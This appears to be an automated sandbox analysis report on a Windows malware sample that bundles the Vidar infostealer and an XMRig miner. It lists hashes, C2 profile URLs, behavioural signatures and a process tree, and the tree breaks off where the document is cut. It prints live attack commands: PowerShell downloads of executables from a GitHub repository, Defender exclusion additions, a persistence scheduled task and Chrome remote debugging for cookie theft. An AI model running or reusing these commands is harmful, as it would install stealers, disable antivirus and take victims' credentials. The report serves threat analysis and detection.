Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
28/03/2025, 14:24
Static task
static1
Behavioral task
behavioral1
Sample
PokyBilsTGS.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral2
Sample
PokyBilsTGS.exe
Resource
win11-20250313-en
General
-
Target
PokyBilsTGS.exe
-
Size
322KB
-
MD5
1b044fbca4a8963fb4ab17ab5ae7c2ef
-
SHA1
c234cc9b4dcb92fdd21ec71bae98745eaf43b7bd
-
SHA256
7c4aa4a2ab6b2a032881e90f13ddd38b675b0d3db391bfd1a60d55927a483587
-
SHA512
cf31978386764bb0fd8c12c32e3c354ead48dacbcffe035e07f2a40ba09a418033e47ecb1e79dfbe6dafe03676cb834f2281a8456b82e8e4a13b9ddfac9d6d00
-
SSDEEP
6144:GmQCJp3wv+eLkfCOuHejhurki9H/WUgCNxwsD7Gm:vHa+ekfxjhurv9eMksD6m
Malware Config
Extracted
vidar
13.3
886e3178ef0cef21a6ff7125395660f2
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/files/0x00090000000281e8-54.dat family_vidar_v7 -
Vidar family
-
Xmrig family
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral1/memory/940-454-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/940-460-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/940-458-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/940-459-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/940-457-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/940-456-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/940-453-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/940-795-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/940-796-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
Blocklisted process makes network request 6 IoCs
flow pid Process 14 5072 powershell.exe 15 5000 powershell.exe 16 5060 powershell.exe 19 5060 powershell.exe 18 5000 powershell.exe 20 5072 powershell.exe -
pid Process 5000 powershell.exe 5060 powershell.exe 5072 powershell.exe 4192 powershell.exe 2396 powershell.exe 3212 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 3 IoCs
flow pid Process 18 5000 powershell.exe 19 5060 powershell.exe 20 5072 powershell.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts gyavpcsu.exe File created C:\Windows\system32\drivers\etc\hosts Updater.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3132 msedge.exe 956 msedge.exe 4988 msedge.exe 384 chrome.exe 6020 chrome.exe 944 chrome.exe 1664 chrome.exe 1984 chrome.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\International\Geo\Nation tlihcjzedqze.exe Key value queried \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\International\Geo\Nation PokyBilsTGS.exe Key value queried \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\International\Geo\Nation qspicbaufo.exe Key value queried \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\International\Geo\Nation service.exe -
Executes dropped EXE 5 IoCs
pid Process 2308 qspicbaufo.exe 5824 tlihcjzedqze.exe 2612 gyavpcsu.exe 5380 service.exe 4596 Updater.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 18 raw.githubusercontent.com 19 raw.githubusercontent.com 20 raw.githubusercontent.com 93 pastebin.com 17 raw.githubusercontent.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1328 powercfg.exe 5188 powercfg.exe 4792 powercfg.exe 1956 powercfg.exe 3916 powercfg.exe 2468 powercfg.exe 5076 powercfg.exe 4204 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe gyavpcsu.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4596 set thread context of 2772 4596 Updater.exe 180 PID 4596 set thread context of 940 4596 Updater.exe 185 -
resource yara_rule behavioral1/memory/940-448-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-449-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-454-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-460-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-458-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-459-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-457-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-456-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-453-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-451-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-452-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-450-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-795-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/940-796-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp msedge.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3816 sc.exe 3120 sc.exe 1332 sc.exe 4848 sc.exe 1104 sc.exe 5876 sc.exe 5896 sc.exe 5660 sc.exe 2960 sc.exe 2484 sc.exe 4508 sc.exe 2388 sc.exe 2592 sc.exe 5004 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qspicbaufo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tlihcjzedqze.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 tlihcjzedqze.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString tlihcjzedqze.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2132 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876455670293670" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4056 schtasks.exe 6080 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3212 powershell.exe 3212 powershell.exe 5000 powershell.exe 5060 powershell.exe 5072 powershell.exe 5000 powershell.exe 5060 powershell.exe 5072 powershell.exe 5824 tlihcjzedqze.exe 5824 tlihcjzedqze.exe 5824 tlihcjzedqze.exe 5824 tlihcjzedqze.exe 384 chrome.exe 384 chrome.exe 5824 tlihcjzedqze.exe 5824 tlihcjzedqze.exe 2612 gyavpcsu.exe 4192 powershell.exe 4192 powershell.exe 4192 powershell.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 2612 gyavpcsu.exe 4596 Updater.exe 2396 powershell.exe 2396 powershell.exe 2396 powershell.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 4596 Updater.exe 5824 tlihcjzedqze.exe 5824 tlihcjzedqze.exe 940 explorer.exe 940 explorer.exe 940 explorer.exe 940 explorer.exe 940 explorer.exe 940 explorer.exe 940 explorer.exe 940 explorer.exe 5824 tlihcjzedqze.exe 5824 tlihcjzedqze.exe 940 explorer.exe 940 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 3132 msedge.exe 3132 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3212 powershell.exe Token: SeIncreaseQuotaPrivilege 3212 powershell.exe Token: SeSecurityPrivilege 3212 powershell.exe Token: SeTakeOwnershipPrivilege 3212 powershell.exe Token: SeLoadDriverPrivilege 3212 powershell.exe Token: SeSystemProfilePrivilege 3212 powershell.exe Token: SeSystemtimePrivilege 3212 powershell.exe Token: SeProfSingleProcessPrivilege 3212 powershell.exe Token: SeIncBasePriorityPrivilege 3212 powershell.exe Token: SeCreatePagefilePrivilege 3212 powershell.exe Token: SeBackupPrivilege 3212 powershell.exe Token: SeRestorePrivilege 3212 powershell.exe Token: SeShutdownPrivilege 3212 powershell.exe Token: SeDebugPrivilege 3212 powershell.exe Token: SeSystemEnvironmentPrivilege 3212 powershell.exe Token: SeRemoteShutdownPrivilege 3212 powershell.exe Token: SeUndockPrivilege 3212 powershell.exe Token: SeManageVolumePrivilege 3212 powershell.exe Token: 33 3212 powershell.exe Token: 34 3212 powershell.exe Token: 35 3212 powershell.exe Token: 36 3212 powershell.exe Token: SeDebugPrivilege 5000 powershell.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeShutdownPrivilege 384 chrome.exe Token: SeCreatePagefilePrivilege 384 chrome.exe Token: SeDebugPrivilege 4192 powershell.exe Token: SeIncreaseQuotaPrivilege 4192 powershell.exe Token: SeSecurityPrivilege 4192 powershell.exe Token: SeTakeOwnershipPrivilege 4192 powershell.exe Token: SeLoadDriverPrivilege 4192 powershell.exe Token: SeSystemProfilePrivilege 4192 powershell.exe Token: SeSystemtimePrivilege 4192 powershell.exe Token: SeProfSingleProcessPrivilege 4192 powershell.exe Token: SeIncBasePriorityPrivilege 4192 powershell.exe Token: SeCreatePagefilePrivilege 4192 powershell.exe Token: SeBackupPrivilege 4192 powershell.exe Token: SeRestorePrivilege 4192 powershell.exe Token: SeShutdownPrivilege 4192 powershell.exe Token: SeDebugPrivilege 4192 powershell.exe Token: SeSystemEnvironmentPrivilege 4192 powershell.exe Token: SeRemoteShutdownPrivilege 4192 powershell.exe Token: SeUndockPrivilege 4192 powershell.exe Token: SeManageVolumePrivilege 4192 powershell.exe Token: 33 4192 powershell.exe Token: 34 4192 powershell.exe Token: 35 4192 powershell.exe Token: 36 4192 powershell.exe Token: SeShutdownPrivilege 3916 powercfg.exe Token: SeCreatePagefilePrivilege 3916 powercfg.exe Token: SeShutdownPrivilege 5076 powercfg.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 384 chrome.exe 3132 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3408 wrote to memory of 524 3408 PokyBilsTGS.exe 86 PID 3408 wrote to memory of 524 3408 PokyBilsTGS.exe 86 PID 524 wrote to memory of 3212 524 cmd.exe 87 PID 524 wrote to memory of 3212 524 cmd.exe 87 PID 3408 wrote to memory of 4972 3408 PokyBilsTGS.exe 91 PID 3408 wrote to memory of 4972 3408 PokyBilsTGS.exe 91 PID 3408 wrote to memory of 4992 3408 PokyBilsTGS.exe 92 PID 3408 wrote to memory of 4992 3408 PokyBilsTGS.exe 92 PID 3408 wrote to memory of 4988 3408 PokyBilsTGS.exe 93 PID 3408 wrote to memory of 4988 3408 PokyBilsTGS.exe 93 PID 4972 wrote to memory of 5000 4972 cmd.exe 94 PID 4972 wrote to memory of 5000 4972 cmd.exe 94 PID 4988 wrote to memory of 5060 4988 cmd.exe 95 PID 4988 wrote to memory of 5060 4988 cmd.exe 95 PID 4992 wrote to memory of 5072 4992 cmd.exe 96 PID 4992 wrote to memory of 5072 4992 cmd.exe 96 PID 3408 wrote to memory of 2308 3408 PokyBilsTGS.exe 97 PID 3408 wrote to memory of 2308 3408 PokyBilsTGS.exe 97 PID 3408 wrote to memory of 2308 3408 PokyBilsTGS.exe 97 PID 2308 wrote to memory of 2884 2308 qspicbaufo.exe 99 PID 2308 wrote to memory of 2884 2308 qspicbaufo.exe 99 PID 2308 wrote to memory of 2884 2308 qspicbaufo.exe 99 PID 2884 wrote to memory of 4056 2884 cmd.exe 101 PID 2884 wrote to memory of 4056 2884 cmd.exe 101 PID 2884 wrote to memory of 4056 2884 cmd.exe 101 PID 3408 wrote to memory of 5824 3408 PokyBilsTGS.exe 102 PID 3408 wrote to memory of 5824 3408 PokyBilsTGS.exe 102 PID 3408 wrote to memory of 5824 3408 PokyBilsTGS.exe 102 PID 3408 wrote to memory of 2612 3408 PokyBilsTGS.exe 104 PID 3408 wrote to memory of 2612 3408 PokyBilsTGS.exe 104 PID 5380 wrote to memory of 3824 5380 service.exe 108 PID 5380 wrote to memory of 3824 5380 service.exe 108 PID 5380 wrote to memory of 3824 5380 service.exe 108 PID 3824 wrote to memory of 6080 3824 cmd.exe 110 PID 3824 wrote to memory of 6080 3824 cmd.exe 110 PID 3824 wrote to memory of 6080 3824 cmd.exe 110 PID 5824 wrote to memory of 384 5824 tlihcjzedqze.exe 112 PID 5824 wrote to memory of 384 5824 tlihcjzedqze.exe 112 PID 384 wrote to memory of 5272 384 chrome.exe 113 PID 384 wrote to memory of 5272 384 chrome.exe 113 PID 384 wrote to memory of 1884 384 chrome.exe 114 PID 384 wrote to memory of 1884 384 chrome.exe 114 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115 PID 384 wrote to memory of 5812 384 chrome.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\PokyBilsTGS.exe"C:\Users\Admin\AppData\Local\Temp\PokyBilsTGS.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\zlvkc', 'C:\Users', 'C:\ProgramData'"2⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\zlvkc', 'C:\Users', 'C:\ProgramData'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/gfdthawdddd.exe' -OutFile 'C:\Users\Admin\AppData\Local\zlvkc\gyavpcsu.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/gfdthawdddd.exe' -OutFile 'C:\Users\Admin\AppData\Local\zlvkc\gyavpcsu.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/tkskfaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\zlvkc\qspicbaufo.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/tkskfaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\zlvkc\qspicbaufo.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/nbotpasppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\zlvkc\tlihcjzedqze.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/nbotpasppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\zlvkc\tlihcjzedqze.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
-
C:\Users\Admin\AppData\Local\zlvkc\qspicbaufo.exe"C:\Users\Admin\AppData\Local\zlvkc\qspicbaufo.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4056
-
-
-
-
C:\Users\Admin\AppData\Local\zlvkc\tlihcjzedqze.exe"C:\Users\Admin\AppData\Local\zlvkc\tlihcjzedqze.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5824 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:384 -
